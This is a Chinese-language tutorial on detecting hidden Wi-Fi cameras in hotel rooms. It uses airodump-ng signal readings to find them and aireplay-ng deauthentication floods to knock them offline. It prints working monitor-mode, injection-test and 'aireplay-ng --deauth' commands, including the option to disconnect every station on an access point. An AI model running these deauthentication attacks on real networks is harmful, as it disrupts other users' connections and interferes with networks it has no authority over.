使用无线信号特性,查找和终结快捷宾馆中摄像头的一种方法 (无线安全？一点都不安全开篇)

各位在快捷宾馆住宿时有没有遇到或者担心遇到什么糟心事？被针孔摄像头偷拍算不算一件很糟心的事?本文提出一种方法来应对这种情况。

针孔摄像头拍摄后势必会通过网络将视屏传送给安装者。由于针孔摄像头的隐蔽性，摄像头不会使用有线网络，剩下的选项就是无线网络了。无线网络有2种选项：a.插入SIM卡，通过4G网络传输；b.使用快捷酒店会提供的WIFI。选项b的投入比选项a小，而且便于集成，另外SIM卡可能是实名制的会被追查，所以针孔摄像头多使用选项b。所以这次将讨论在2.4G WIFI环境中查找摄像头的方法，以及相应的处理方法。为了实现上述目的，需要用到Kali Linux的Aircrack-NG套件，另外还需要可以切换到Monitor模式的无线网卡。在开始之前，先说明几个会用到的术语：AP—指提供热点的设备，通常是无线路由器；Station—指连接到AP的设备，如笔电，手机等，essid—指AP提供的接入点名字，点击windows网络连接时，列表中的接入点名字就是essid。

Topic 1: 查找房间里摄像头

Introduction 1:

Windows网络连接列表里这么多essid是从哪来的？

AP会周期性发送Beacon包，包中带有essid以及通信信道，告诉周围Station在它可探测范围内存在的AP，可以来蹭网。可以在网络连接列表中选择一个essid，点击属性，里面列出了每个essid的属性:如bssid，信道等。另外介绍2个搜索AP的工具1).Windows 下InSsider----Mega Geeker的产品；2).Linux下 LinSsider，开源项目，它们都提供了更友好的图形界面。用这些工具收集附近的AP的信息，重点记录下自己正连接的bssid和essid。

Text1：

查找房间里摄像头，其实是评估房间里无线设备的数量。Aircrack-ng套件中的airodump-ng工具可以扫描并列出特定essid下连接着的Station，同时给出这些Station到你手上的无线网卡的信号衰减程度，一般而言距离越远，衰减越多。根据802.11给出的参考值以及我自己的测试发现：两个设备挨在一起时信号衰减是-10mdb，普通室内信号的衰减在-30mdb—60mdb之间，设备之间隔一堵墙衰减达到-70—80mdb。而这些信号衰减程度有助于我们查找室内无线设备的数量。设想，当走进陌生的房间，可见的无线设备无非是房间网络电视机1台，如果列表中给出的Station数量多的有点惊人，而且这些Station的信号衰减程度在-70mdb以内可以断定房间里杀气腾腾。通过在房间里走动，观察信号衰减程度的变化，可以接近和定位其中一个针孔摄像头。

>airodump-ng --bssid 50:fa:84:16:46:ea --essid WirelessLab –c 1 –a
#-c是指AP使用的信道从前面LinSsid获得
#--bssid,--essid的参数 50:fa:84:16:46:ea和WirelessLab从前面LinSsid获得

图中airodump-ng的输出中 PWR那一列是运行airodump-ng的机器到房间内其他Station的信号衰减程度

Topic 2: 断开摄像头的链接

Introduction 2:

TCP(是怎样建立连接的？)通过3次握手建立连接。Station与AP建立WIFI连接有类似的过程：扫描-认证-关联-连接4个阶段。Station和AP建立连接后，可以发送Deauthentication包让Station解除认证。Deauthentication是IEEE 802.11 协议所规定的，用来解除认证的帧。具有如下特点：1).没有加密任何人都可以发送;2).容易伪造来源MAC地址3).强制客户端掉线

Tex2:

前面的步骤即使我们找到了所有的摄像头，也不代表我们可以把这些摄像头全部取下来并关闭。比如，有些摄像头藏在墙上插座后面，我总不至于出差在外还带着螺丝刀把面板卸下来。万一触电怎么办？就算没触电，破坏酒店设置又怎么办？面对这些摄像头，我们就真的无计可施了？倒也不是，可以让摄像头断网，那视频就无法上传了。这就用到aircrack-ng套件中的另一个工具aireply-ng，它可以向AP/Station发送包含特定数据的包，比如Deauthentication包,让特定的station下线.

实施前首先要测试AP是否可以注入

root@kali:~# airmon-ng start wlan1 #将网卡切换到Monitor模式
root@kali:~# iwconfig wlan1mon ch 1#使网卡监听Ch 1信道

root@kali:~# aireplay-ng --test -e Wireless -a 50:fa:84:16:46:ea  wlan1mon
02:30:50  Waiting for beacon frame (BSSID: 50:FA:84:16:46:EA) on channel 1
For the given BSSID "50:FA:84:16:46:EA", there is an ESSID mismatch!
Found ESSID "WirelessLab" vs. specified ESSID "Wireless"
Using the given one, double check it to be sure its correct!
02:30:50  Trying broadcast probe requests...
02:30:50  Injection is working! #有这段话，可以认为可以实施注入
02:30:52  Found 1 AP 02:30:52  Trying directed probe requests...
02:30:52  50:FA:84:16:46:EA - channel: 1 - 'Wireless'
02:30:52  Ping (min/avg/max): 3.068ms/6.721ms/14.074ms Power: -60.57
02:30:52  30/30: 100% #

确定AP可以注入后，即可实施断网

root@kali:~# aireplay-ng --deauth=5000 -a 50:fa:84:16:46:ea wlan1mon -c 2C:61:F6:99:AA:22
-c指定一个Station，不加 -c选项则将AP下所有的Station全踢下线

Summary:

我们的网卡一般工作在Managed模式下，只能接受发送AP发送给它的帧。Station收到这些帧后，会把802.11头部剥去，替换为Ethnet头部然后发送给网络协议栈。这样做的好处是对上层应用屏蔽其底层传输介质，坏处就是无法分析802.11协议头部。如果想接受到周围的所有数据帧，以及完成上述实验，需要将网卡切换到Monitor模式。当然不是所有的网卡支持Monitor模式。Windows下只能选Mega Geek的Airpcap网卡，就是贵了点：支持802.11 b/g/n协议的大概要2K左右;支持a/b/g/n协议的在5K左右。所以一般会在Linux下完成上述任务。另外，如果网卡只支持802.11 b/g/n协议，那么它将接受不到5GHz的AP信号。当然了现在很多无线设备和无线路由只支持b/g/n协议。

查看网卡支持的工作模式以及支持的802.11协议：

# iw list
Supported interface modes:
#支持的工作模式* IBSS* managed* AP* AP/VLAN* monitor
…
Frequencies:
#支持的频段* 2412 MHz [1] (20.0 dBm)* 2417 MHz [2] (20.0 dBm)